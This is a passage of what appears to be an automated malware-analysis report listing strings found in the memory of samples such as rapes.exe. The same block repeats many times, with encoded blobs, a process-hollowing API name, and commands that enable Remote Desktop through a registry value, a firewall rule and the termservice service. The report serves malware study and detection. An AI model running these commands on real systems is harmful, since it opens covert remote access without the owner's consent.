ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe; String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000003.1399696987.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000003.1399696987.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000C.00000002.1440488176.00000000002B1000.00000040.00000001.01000000.0000000F.sdmp; String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000002.1440488176.00000000002B1000.00000040.00000001.01000000.0000000F.sdmp; String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe; String found in binary or memory: net start termservice
Source: rapes.exe, 0000000D.00000002.1443417785.00000000002B1000.00000040.00000001.01000000.0000000F.sdmp; String found in binary or memory: net start termservice
Source: rapes.exe, 0000000D.00000002.1443417785.00000000002B1000.00000040.00000001.01000000.0000000F.sdmp; String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000D.00000003.1402595713.00000000049D0000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: net start termservice
Source: rapes.exe, 0000000D.00000003.1402595713.00000000049D0000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE; String found in binary or memory: net start termservice
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000E.00000002.1457033366.0000000000621000.00000040.00000001.01000000.0000000B.sdmp; String found in binary or memory: net start termservice
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000E.00000002.1457033366.0000000000621000.00000040.00000001.01000000.0000000B.sdmp; String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000E.00000003.1414306794.0000000005090000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: net start termservice
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000E.00000003.1414306794.0000000005090000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM 